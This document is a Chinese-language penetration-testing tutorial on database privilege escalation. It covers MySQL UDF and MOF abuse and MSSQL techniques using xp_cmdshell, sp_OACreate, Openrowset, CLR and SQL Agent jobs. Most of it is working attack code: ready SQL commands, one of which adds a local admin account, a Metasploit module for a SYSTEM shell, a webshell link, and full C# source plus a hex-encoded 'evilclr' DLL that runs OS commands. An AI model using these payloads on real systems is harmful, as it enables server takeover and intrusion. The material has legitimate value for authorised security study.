权限提升-数据库

MySQL数据库

UDF提权

UDF提权原理

UDF(user-defined function)是MySQL的一个拓展接口，也可称之为用户自定义函数

用户可以通过自己增加函数对mysql功能进行扩充，文件后缀为.dll

利用root权限，创建带有调用cmd函数的’udf.dll’(动态链接库)

当我们把’udf.dll’导出指定文件夹引入Mysql时，其中的调用函数拿出来当作mysql的函数使用。

这样我们自定义的函数才被当作本机函数执行。

在使用CREAT FUNCITON调用dll中的函数后，mysql账号转化为system权限，从而提权

利用条件

1、有mysql的root账号密码

2、secure_file_priv为空

当secure_file_priv没有具体值时，表示不对MySQL的导入导出做限制，null表示不允许导入导出

#查看secure_file_priv的值
SHOW VARIABLES LIKE "secure_file_priv";

#这个值可以在my.ini设置为空
secure_file_priv =

操作步骤

1、查询插件安装目录

show variables like %plugin%

mysql版本 < 5.2 , UDF导出到系统目录 c:/windows/system32/
mysql版本 > 5.2 ，UDF导出到安装路径 MySQL\Lib\Plugin\

2、如果plugin不存在，可以用NTFS ADS流来创建文件夹并导入dll

--先找到Mysql的目录
select @@basedir;

--利用ADS流来创建plugin文件夹（测试并不能成功创建）
select 'It is dll' into dumpfile 'C:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';

--有Webshell这样创建plugin文件夹：
echo 123 > C:\phpStudy\PHPTutorial\MySQL\lib\plugin::$INDEX_ALLOCATION

通过WebShell上传udf.php（这种方法数据库不用外连也可以）

https://github.com/echohun/tools/blob/master/大马/udf.php

MOF提权

MOF提权原理

MOF文件是mysql数据库的扩展文件（在c:/windows/system32/wbem/mof/nullevt.mof）

叫做”托管对象格式”，其作用是每隔五秒就会去监控进程创建和死亡，而且是系统权限；

我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件；

然后系统每隔五秒就会执行一次我们上传的MOF。

MOF当中有一段是vbs脚本，我们可以通过控制这段vbs脚本的内容让系统执行命令，进行提权。

利用条件

已知数据库root账号密码，数据库允许外连

mysql在c:/windows/system32/wbem/mof目录有写权限

secure_file_priv 为空

条件非常严苛，数据库在system32写文件这个条件一般很难达到，而且较新的系统无法使用MOF提权

MSF 下有Mof 提权模块

#执行成功后会直接反弹一个 system权限的meterpreter 。
use exploit/windows/mysql/mysql_mof

MSSQL数据库

首先查看权限

--是否sa权限，返回 1 就是sa
select IS_SRVROLEMEMBER('sysadmin')

--是否dba权限，返回 1 就是DBA
select IS_MEMBER('db_owner')

一、xp_cmdshell

利用条件

MSSQL以system运行的才能提权，nt authority\network service，是没有系统权限的。

这个组件默认情况下是关闭的，用下边的命令开启

EXEC sp_configure 'show advanced options', 1; --允许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; --打开xp_cmdshell扩展
RECONFIGURE;

如果xp_cmdshell被删除，可以尝试上传xplog70.dll https://fix4dll.com/xplog70_dll 进行恢复

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\xplog70.dll';

--然后执行命令

exec xp_cmdshell 'whoami';

二、SP_OACreate

当xp_cmdshell 删除以后，还可以使用SP_OACreate

原理

sp_oacreate存储过程可以删除、复制、移动文件；

还能配合sp_oamethod 来写文件，通过 wscript.shell 调用cmd执行系统命令

首先要打开组件：

--开启
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;


--关闭
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;

之后使用以下语句执行命令：

declare @shell int;
exec sp_oacreate 'wscript.shell',@shell output;
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'

这种方式是无回显的，打开1.txt查看命令执行结果

type c:\\1.txt

三、Openrowset沙盒

(2003系统可用、2012-r2实验失败)

利用原理

沙盒模式是数据库的一种安全功能。

在沙盒模式下，只对控件和字段属性中的安全且不含恶意代码的表达式求值。

如果表达式不使用可能以某种方式损坏数据的函数或属性，则可认为它是安全的。

本质是修改注册表 来劫持粘贴键 当然在2008数据库是不成立的 因为默认权限很低

开启默认关闭的xp_regwrite存储过程

--开启
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE' ,'SOFTWARE\Microsoft\Jet\4.0\Engines' ,'SandBoxMode' ,'REG_DWORD' ,0;
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;RECONFIGURE;

--利用完后恢复
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',2;
EXEC sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;
EXEC sp_configure 'show advanced options',0;reconfigure;

利用jet.oledb执行系统命令

这个也是无回显的

SELECT * From OpenRowSet('Microsoft.Jet.OLEDB.4.0' ,';Databasec:\windows\system32\ias\ias.mdb','select shell( net user admin pwd123 /add )');

沙盒模式SandBoxMode参数含义（默认是2）

0：在任何所有者中禁止启用安全模式

1 ：为仅在允许范围内

2 ：必须在access模式下

3：完全开启

CLR公共语言运行时

利用原理

CLR是.NET框架的核心，为.NET程序提供了代码的执行环境。

SQL CLR 是 SQL Server2005 出现的新功能，它将.NET框架中的 CLR 服务注入到 SQL Server 中

让 SQL Server 的部分数据库对象可以使用 .NET 框架的编程语言进行开发（VB、C#）。

制作恶意CLR

运行环境说明

MSSQL <= 2008：.NET3.5

MSSQL >= 2012：.NET4.0+

使用C#来创建一个clr项目，在项目中我们创建一个存储过程调用cmd来执行命令

1）创建MSSQL数据库项目

2）修改项目属性

选择.NET版本，因为要调用外部程序，必须设置权限级别为UNSAFE

3）新建CLR存储过程

4）CLR代码

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Text;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void ExecCommand (string cmd)
    {
        // 在此处放置代码
        SqlContext.Pipe.Send("Command is running...");
        SqlContext.Pipe.Send(RunCommand("cmd.exe", " /c " + cmd));
    }
    public static string RunCommand(string filename,string arguments)
    {
        var process = new Process();

        process.StartInfo.FileName = filename;
        if (!string.IsNullOrEmpty(arguments))
        {
            process.StartInfo.Arguments = arguments;
        }

        process.StartInfo.CreateNoWindow = true;
        process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
        process.StartInfo.UseShellExecute = false;

        process.StartInfo.RedirectStandardError = true;
        process.StartInfo.RedirectStandardOutput = true;
        var stdOutput = new StringBuilder();
        process.OutputDataReceived += (sender, args) => stdOutput.AppendLine(args.Data);
        string stdError = null;
        try
        {
            process.Start();
            process.BeginOutputReadLine();
            stdError = process.StandardError.ReadToEnd();
            process.WaitForExit();
        }
        catch (Exception e)
        {
            SqlContext.Pipe.Send(e.Message);
        }

        if (process.ExitCode == 0)
        {
            SqlContext.Pipe.Send(stdOutput.ToString());
        }
        else
        {
            var message = new StringBuilder();

            if (!string.IsNullOrEmpty(stdError))
            {
                message.AppendLine(stdError);
            }

            if (stdOutput.Length != 0)
            {
                message.AppendLine("Std output:");
                message.AppendLine(stdOutput.ToString());
            }
            SqlContext.Pipe.Send(filename + arguments + " finished with exit code = " + process.ExitCode + ": " + message);
        }
        return stdOutput.ToString();
    }
}

5）编译程序

右键项目点击"生成"，生成解决方案进行编译；

在项目的bin目录会生成导入程序集并且创建执行命令存储过程的sql语句。

导入程序集

CLR功能MSSQL中是默认没有开启的，需要手动开启

sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO

--将数据库标记为安全
ALTER DATABASE master SET TRUSTWORTHY ON;

在项目编译完之后生成的sql文件中有字节流形式的语句来导入

CREATE ASSEMBLY [evilclr]
    AUTHORIZATION [dbo]
    FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C01030006D280630000000000000000E00022200B013000000E00000006000000000000362C0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000E42B00004F00000000400000A002000000000000000000000000000000000000006000000C000000AC2A00001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E746578740000003C0C000000200000000E000000020000000000000000000000000000200000602E72737263000000A0020000004000000004000000100000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000182C00000000000048000000020005007C220000300800000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CA00280600000A72010000706F0700000A00280600000A722D000070723D00007002280800000A28020000066F0700000A002A001B300600BC0100000100001173040000060A00730900000A0B076F0A00000A026F0B00000A0003280C00000A16FE010D092C0F00076F0A00000A036F0D00000A0000076F0A00000A176F0E00000A00076F0A00000A176F0F00000A00076F0A00000A166F1000000A00076F0A00000A176F1100000A00076F0A00000A176F1200000A0006731300000A7D010000040706FE0605000006731400000A6F1500000A00140C00076F1600000A26076F1700000A00076F1800000A6F1900000A0C076F1A00000A0000DE18130400280600000A11046F1B00000A6F0700000A0000DE00076F1C00000A16FE01130511052C1D00280600000A067B010000046F1D00000A6F0700000A000038AA00000000731300000A130608280C00000A16FE01130711072C0B001106086F1E00000A2600067B010000046F1F00000A16FE03130811082C2200110672470000706F1E00000A261106067B010000046F1D00000A6F1E00000A2600280600000A1C8D0E000001251602A2251703A22518725F000070A22519076F1C00000A13091209282000000AA2251A7297000070A2251B1106252D0426142B056F1D00000AA2282100000A6F0700000A0000067B010000046F1D00000A130A2B00110A2A011000000000970025BC0018080000012202282200000A002A4E027B01000004046F2300000A6F1E00000A262A00000042534A4201000100000000000C00000076322E302E35303732370000000005006C000000A8020000237E000014030000AC03000023537472696E677300000000C0060000A0000000235553006007000010000000234755494400000070070000C000000023426C6F620000000000000002000001571502000902000000FA0133001600000100000014000000030000000100000005000000050000002300000005000000010000000100000003000000010000000000D30101000000000006006D01B40206008D01B40206004301A1020F00D402000006003603DE010A00570154020E000F03A1020600E501DE0106002602740306002801B4020E00F402A1020A00800354020A00200154020600C101DE010E00FD01A1020E00CF00A1020E003B02A10206000E023D0006001B023D0006002700DE01000000002D00000000000100010001001000E3020000150001000100030110000100000015000100040006006A03790050200000000096008A007D000100842000000000960096001A0002005C220000000086189B02060004005C220000000086189B02060004006522000000008300160082000400000001007C0000000100EF00000002002503000001003402000002000A0309009B02010011009B02060019009B020A0031009B02060051009B0206006100170110006900A100150071002F031A0039009B0206003900EF0132007900E200150071009E03370079001703150079008B033C007900BF0041007900AB013C00790081023C0079004F033C0049009B02060089009B024700390065004D003900490353003900F800060039006F025700990080005C0039003D0306004100B3005C003900A60060002900BF015C0049000C0164004900C8016000A100BF015C0071002F036A0029009B020600590053005C0020002300BA002E000B0089002E00130092002E001B00B10063002B00BA0020000480000000000000000000000000000000003600000002000000000000000000000070005C000000000002000000000000000000000070004700000000000200000000000000000000007000DE0100000000030002000000003C3E635F5F446973706C6179436C617373315F30003C52756E436F6D6D616E643E625F5F3000496E743332003C4D6F64756C653E00434C5253514C0053797374656D2E494F0053797374656D2E44617461006765745F44617461006D73636F726C6962006164645F4F757470757444617461526563656976656400636D640052656164546F456E640045786563436F6D6D616E640052756E436F6D6D616E640053656E64006765745F45786974436F6465006765745F4D657373616765007365745F57696E646F775374796C650050726F6365737357696E646F775374796C65007365745F46696C654E616D650066696C656E616D6500426567696E4F7574707574526561644C696E6500417070656E644C696E65006765745F506970650053716C5069706500436F6D70696C657247656E6572617465644174747269627574650044656275676761626C654174747269627574650053716C50726F63656475726541747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465007365745F5573655368656C6C4578656375746500546F537472696E67006765745F4C656E67746800434C5253514C2E646C6C0053797374656D00457863657074696F6E006765745F5374617274496E666F0050726F636573735374617274496E666F0053747265616D526561646572005465787452656164657200537472696E674275696C6465720073656E646572004461746152656365697665644576656E7448616E646C6572004D6963726F736F66742E53716C5365727665722E536572766572006765745F5374616E646172644572726F72007365745F52656469726563745374616E646172644572726F72002E63746F720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730053746F72656450726F63656475726573004461746152656365697665644576656E744172677300617267730050726F63657373007365745F417267756D656E747300617267756D656E747300436F6E636174004F626A6563740057616974466F7245786974005374617274007365745F52656469726563745374616E646172644F7574707574007374644F75747075740053797374656D2E546578740053716C436F6E74657874007365745F4372656174654E6F57696E646F770049734E756C6C4F72456D70747900002B43006F006D006D0061006E0064002000690073002000720075006E006E0069006E0067002E002E002E00000F63006D0064002E00650078006500000920002F0063002000001753007400640020006F00750074007000750074003A0000372000660069006E00690073006800650064002000770069007400680020006500780069007400200063006F006400650020003D00200000053A002000000000006DC29D75D404AC4FA59597440474D237000420010108032000010520010111110400001235042001010E0500020E0E0E11070B120C121D0E0212210212250202080E042000123D040001020E0420010102052001011141052002011C180520010112450320000204200012490320000E0320000805200112250E0500010E1D0E08B77A5C561934E08903061225040001010E062002011C122D0801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F7773010801000701000000000401000000000000000006D2806300000000020000001C010000C82A0000C80C0000525344538C4A2EA38568D24B9C139690DCB8972601000000433A5C55736572735C77696E7472797365635C736F757263655C7265706F735C434C5253514C5C6F626A5C44656275675C434C5253514C2E7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000C2C00000000000000000000262C0000002000000000000000000000000000000000000000000000182C0000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000440200000000000000000000440234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000000000000000000000000000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000000B004A4010000010053007400720069006E006700460069006C00650049006E0066006F0000008001000001003000300030003000300034006200300000002C0002000100460069006C0065004400650073006300720069007000740069006F006E000000000020000000300008000100460069006C006500560065007200730069006F006E000000000030002E0030002E0030002E003000000036000B00010049006E007400650072006E0061006C004E0061006D006500000043004C005200530051004C002E0064006C006C00000000002800020001004C006500670061006C0043006F0070007900720069006700680074000000200000003E000B0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043004C005200530051004C002E0064006C006C0000000000340008000100500072006F006400750063007400560065007200730069006F006E00000030002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000030002E0030002E0030002E00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C000000383C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    WITH PERMISSION_SET = UNSAFE;
go

然后创建存储过程

CREATE PROCEDURE [dbo].[ExecCmd]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [evilclr].[StoredProcedures].[ExecCommand]
go

执行系统命令

exec dbo.execcmd 'whoami'

SQL Server Agent job 代理执行计划任务

SQL Server 代理是一项 Microsoft Windows 服务，它执行计划的管理任务，这些任务在 SQL Server 中称为作业。

利用条件

1）拥有 DBA 权限 2）需要 sqlserver 代理 (sqlagent) 开启，Express 版本Sql Server 是无法启用的

-- 开启 sqlagent 服务
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';

-- 利用任务计划命令执行（无回显,可以 dnslog）
-- 创建任务 test，这里test为任务名称，并执行命令，命令执行后的结果，将返回给文本文档out.txt

use msdb;
exec sp_delete_job null,'test'
exec sp_add_job 'test'
exec sp_add_jobstep null,'test',null,'1','cmdexec','cmd /c "whoami>c:/out.txt"'
exec sp_add_jobserver null,'test',@@servername
exec sp_start_job 'test';